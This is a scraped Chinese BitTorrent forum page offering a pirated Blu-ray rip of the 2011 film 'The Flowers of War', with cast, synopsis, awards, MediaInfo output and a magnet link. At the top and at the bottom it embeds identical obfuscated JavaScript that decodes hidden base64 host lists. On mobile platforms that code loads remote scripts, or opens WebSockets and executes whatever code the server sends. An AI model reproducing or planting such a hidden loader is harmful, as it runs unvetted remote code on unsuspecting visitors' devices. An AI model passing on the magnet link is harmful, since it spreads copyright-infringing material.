金陵十三钗[国语配音/中文字幕].The.Flowers.Of.War.2011.1080p.BluRay.x265.10bit.DTS 10.68GB

版主小s 1月前 298

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 金陵十三钗 / The Flowers Of War

◎年 代 2011

◎产 地 中国大陆 / 中国香港

◎类 别 剧情 / 历史 / 战争

◎语 言 汉语普通话 / 英语 / 日语 / 南京话 / 上海话

◎上映日期 2011-12-15(中国大陆) / 2011-12-23(美国)

◎IMDb链接 https://www.imdb.com/title/tt1410063/

◎豆瓣评分 8.2/10 (596554人评价)

◎豆瓣链接 https://movie.douban.com/subject/3649049/

◎片 长 145分钟

◎导 演 张艺谋 Yimou Zhang (id:1054398)

◎编 剧 刘恒 Heng Liu (id:1276115)

严歌苓 Geling Yan (id:1301405)

◎演 员 克里斯蒂安·贝尔 Christian Bale (id:1005773)

倪妮 Ni Ni (id:1315861)

张歆怡 Xinyi Zhang (id:1316839)

黄天元 Tianyuan Huang (id:1316937)

韩熙庭 Catherine Han (id:1316445)

张逗逗 Doudou Zhang (id:1316938)

佟大为 Dawei Tong (id:1009179)

曹可凡 Kefan Cao (id:1314007)

渡部笃郎 Atsuro Watabe (id:1048608)

黄海波 Haibo Huang (id:1313032)

窦骁 Shawn Dou (id:1274225)

聂远 Yuan Nie (id:1275718)

高虎 Hu Gao (id:1274737)

秦昊 Hao Qin (id:1274463)

李玥敏 Yuemin Li (id:1317006)

白雪 Xue Bai (id:1317007)

袁杨纯子 Chunzi Yuanyang (id:1316996)

孙佳 Sookie (id:1317005)

朱良奇 Liang-qi Zhu (id:1317219)

小林成男 Shigeo Kobayashi (id:1203472)

山中崇 Takashi Yamanaka (id:1319356)

保罗·施耐德 Paul Schneider (id:1031968)

李纯 Chun Li (id:1330356)

顾璇 Xuan Gu (id:1316959)

周梦乔 Mengqiao Zhou (id:1372901)

周羽 Yu Zhou (id:1372902)

邓莉 Li Deng (id:1372903)

苏小妹 Xiaomei Su (id:1334215)

钱柳吟 Liuyin Qian (id:1372904)

叶清源 Qingyuan Ye (id:1322779)

戴瑶君 Yaojun Dai (id:1372905)

沈俊然 Junran Shen (id:1372906)

李楚楚 Chuchu Li (id:1372907)

金子欣 Zixin Jin (id:1372908)

李瑞琦 Ruiqi Li (id:1372909)

谷艺璇 Yixuan Gu (id:1372910)

许佳丽 Jiali Xu (id:1372911)

张照怡 Zhaoyi Zhang (id:1372912)

谭逸敏 Yimin Tan (id:1372914)

赵伊聪 Yicong Zhao (id:1372915)

来喜 Laixi (id:1321645)

奇道 Dao Qi (id:1186926)

王超北 Chaobei Wang (id:1372916)

王羽铮 Yuzheng Wang (id:1351724)

李飞 Fei Li (id:1335598)

王聪 Cong Wang (id:1328679)

项斌 Bin Xiang (id:1343203)

郭晓明 Xiaoming Guo (id:1343359)

涩谷天马 Tenma Shibuya (id:1314962)

梶冈润一 Junichi Kajioka (id:1233386)

王靖雯 Jingwen Wang (id:1457187)

松田笃儿 Atsuji Matsuda (id:1449206)

松角洋平 Yohei Matsukado (id:1389590)

赵德龙 Delong Zhao (id:1333310)

王景春 Jingchun Wang (id:1275934)

高岛真一 Shinichi Takashinichi (id:1344119)

高木贞佑 Teiyu Takagi (id:1325165)

江志强 William Kong (id:1288870)

黄新明 Xinming Huang (id:1316674)

张伟平 Weiping Zhang (id:1301698)

陈其钢 Qigang Chen (id:1316672)

王之一 Zhiyi Wang (id:1398216)

赵小丁 Xiaoding Zhao (id:1274347)

张末 Mo Zhang (id:1329527)

孟佩璁 Peicong Meng (id:1316673)

任永强 Yongqiang Ren (id:1318834)

张叔平 William Chang (id:1274369)

李耀辉 Yaohui Li (id:1415921)

种田阳平 Yohei Taneda (id:1298897)

赤冢佳仁 Yoshihito Akatsuka (id:1388354)

张叔平 William Chang (id:1274369)

臧溪川 Xichuan Zang (id:1328672)

付璐璐 Lulu Fu (id:1401800)

张末 Mo Zhang (id:1329527)

陈涵 Han Chen (id:1349798)

李庆 Qing Li (id:1379654)

郝钢 Gang Hao (id:1388362)

黄铮 Zheng 'Joe' Huang (id:1376950)

陶经 Jing Tao (id:1298913)

冀红芮 Hongrui Ji (id:1311587)

蒋燕鸣 Yanming Jiang (id:1330655)

彭柯 Peng Ke (id:1398703)

罗礼贤 Bruce Law (id:1289542)

◎标 签 战争 / 南京 / 人性 / 女性 / 历史 / 中国 / 感人 / 剧情

◎简 介

1937年,日军入侵南京,战火中,六朝古都化为废墟,众多中国军民被困城中。一支十数人的国军德械教导队余部在长官李教官(佟大为 饰)指挥下,从日军手中救出了一批教会学校女学生,而李教官等人,至此丧失了出城的机会。幸免于难的书娟(张歆怡 饰)等学生返回文彻斯特教堂,随她们一 起来到的,还有受雇远道至此收敛神父遗体的美国人约翰·米勒(克里斯蒂安·贝尔 Christian Bale 饰)。此时的南京城中,逃难的人们蜂拥进安全区和教堂寻找庇护,十四名风尘女子强行进入教堂避难,其中精通英语的玉墨(倪妮 饰)希望借助约翰的身份为一行人提供更多保护。教堂的墙壁,并不能阻挡日军的铁蹄,教堂内的人们,将面临孰生孰死的选择……

◎获奖情况 (共19项)

第69届金球奖 (2012)

电影类 最佳外语片(提名)

└──张艺谋 (id:1054398)

第31届香港电影金像奖 (2012)

最佳两岸华语电影(提名)

第15届中国电影华表奖 (2013)

优秀故事片奖

第6届亚洲电影大奖 (2012)

最佳电影(提名)

最佳导演(提名)

└──张艺谋 (id:1054398)

最佳新演员

└──倪妮 (id:1315861)

最佳编剧(提名)

最佳原创音乐(提名)

└──陈其钢 (id:1316672)

最佳造型设计(提名)

└──张叔平 (id:1274369)

第12届华语电影传媒大奖 (2012)

观众票选最受瞩目电影(提名)

观众票选最受瞩目男演员

└──佟大为 (id:1009179)

观众票选最受瞩目女演员

└──倪妮 (id:1315861)

最佳女主角(提名)

└──倪妮 (id:1315861)

最佳新演员(提名)

└──倪妮 (id:1315861)

第3届金扫帚奖 (2012)

最令人失望影片评委会特别奖

第2届豆瓣电影鑫像奖 (2012)

鑫豆单元 最佳影片(华语)(提名)

鑫豆单元 最佳导演(华语)(提名)

└──张艺谋 (id:1054398)

鑫豆单元 最佳男演员(华语)(提名)

└──克里斯蒂安·贝尔 (id:1005773)

鑫豆单元 最佳女演员(华语)(提名)

└──倪妮 (id:1315861)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 282083261507738064768506414727896761098 (0xD437429054BEAA5684E3BB4BBB50030A)

  4. Complete name : [email protected].COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 10.7 GiB

  8. Duration : 2 h 25 min

  9. Overall bit rate : 10.5 Mb/s

  10. Movie name : The flowers of war - Blu-ray?

  11. Encoded date : UTC 2021-10-24 04:24:45

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 2 h 25 min

  23. Bit rate : 8 905 kb/s

  24. Width : 1 920 pixels

  25. Height : 816 pixels

  26. Display aspect ratio : 2.35:1

  27. Frame rate mode : Constant

  28. Frame rate : 24.000 FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.237

  33. Stream size : 9.08 GiB (85%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=18.5000 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. Format : DTS

  41. Format/Info : Digital Theater Systems

  42. Codec ID : A_DTS

  43. Duration : 2 h 25 min

  44. Bit rate mode : Constant

  45. Bit rate : 1 510 kb/s

  46. Channel(s) : 6 channels

  47. Channel layout : C L R Ls Rs LFE

  48. Sampling rate : 48.0 kHz

  49. Frame rate : 93.750 FPS (512 SPF)

  50. Bit depth : 24 bits

  51. Compression mode : Lossy

  52. Stream size : 1.54 GiB (14%)

  53. Language : Chinese

  54. Default : Yes

  55. Forced : No


  56. Text #1

  57. ID : 3

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 2 h 19 min

  63. Bit rate : 31.0 kb/s

  64. Count of elements : 3542

  65. Stream size : 31.0 MiB (0%)

  66. Title : chs&eng

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No


  70. Text #2

  71. ID : 4

  72. Format : PGS

  73. Muxing mode : zlib

  74. Codec ID : S_HDMV/PGS

  75. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  76. Duration : 2 h 19 min

  77. Bit rate : 31.2 kb/s

  78. Count of elements : 3542

  79. Stream size : 31.2 MiB (0%)

  80. Title : cht&eng

  81. Language : Chinese

  82. Default : No

  83. Forced : No


  84. Text #3

  85. ID : 5

  86. Format : PGS

  87. Muxing mode : zlib

  88. Codec ID : S_HDMV/PGS

  89. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  90. Duration : 2 h 19 min

  91. Bit rate : 19.0 kb/s

  92. Count of elements : 3542

  93. Stream size : 19.0 MiB (0%)

  94. Title : chs

  95. Language : Chinese

  96. Default : No

  97. Forced : No


  98. Text #4

  99. ID : 6

  100. Format : PGS

  101. Muxing mode : zlib

  102. Codec ID : S_HDMV/PGS

  103. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  104. Duration : 2 h 19 min

  105. Bit rate : 19.2 kb/s

  106. Count of elements : 3542

  107. Stream size : 19.2 MiB (0%)

  108. Title : cht

  109. Language : Chinese

  110. Default : No

  111. Forced : No


  112. Text #5

  113. ID : 7

  114. Format : PGS

  115. Muxing mode : zlib

  116. Codec ID : S_HDMV/PGS

  117. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  118. Duration : 2 h 19 min

  119. Bit rate : 25.4 kb/s

  120. Count of elements : 3540

  121. Stream size : 25.3 MiB (0%)

  122. Title : eng

  123. Language : English

  124. Default : No

  125. Forced : No


  126. Menu

  127. 00:00:00.000 : en:Chapter 01

  128. 00:08:11.791 : en:Chapter 02

  129. 00:15:41.000 : en:Chapter 03

  130. 00:22:23.208 : en:Chapter 04

  131. 00:29:36.250 : en:Chapter 05

  132. 00:35:34.500 : en:Chapter 06

  133. 00:40:04.458 : en:Chapter 07

  134. 00:51:17.416 : en:Chapter 08

  135. 01:01:56.541 : en:Chapter 09

  136. 01:07:56.916 : en:Chapter 10

  137. 01:14:03.791 : en:Chapter 11

  138. 01:21:18.541 : en:Chapter 12

  139. 01:30:07.083 : en:Chapter 13

  140. 01:37:42.958 : en:Chapter 14

  141. 01:43:31.416 : en:Chapter 15

  142. 01:49:49.625 : en:Chapter 16

  143. 01:59:46.625 : en:Chapter 17

  144. 02:05:38.291 : en:Chapter 18

  145. 02:10:29.583 : en:Chapter 19

  146. 02:17:06.583 : en:Chapter 20


TAGS 剧情 历史 战争

磁力链:
  • magnet:?xt=urn:btih:AA8EF89AAE6983F3E4D1042509FDA4D548FFD616

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};